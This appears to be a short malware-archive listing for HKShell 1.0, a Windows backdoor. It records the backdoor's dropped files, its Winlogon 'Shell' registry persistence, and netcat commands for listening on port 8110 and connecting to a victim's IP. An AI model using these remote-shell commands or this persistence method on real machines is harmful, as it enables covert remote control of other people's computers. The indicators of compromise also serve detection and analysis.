HKShell 1.0
(Backdoor.Win32.Small.eh)

by xHydra

Written in Microsoft Visual C++

Released in December 2004

Made in China

more versions


To be used with NetCat
nc.exe -vv -l -p 8110
nc.exe -vv Victim_Ip port


Dropped files:
c:\WINDOWS\system32\inject.exe    Size: 2,032 bytes 
c:\WINDOWS\system32\rshell32.dll  Size: 3,024 bytes 

added to registry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon "Shell"
old data: Explorer.exe 
new data: Explorer.exe inject.exe 



tested on Windows XP
March 16, 2005

MegaSecurity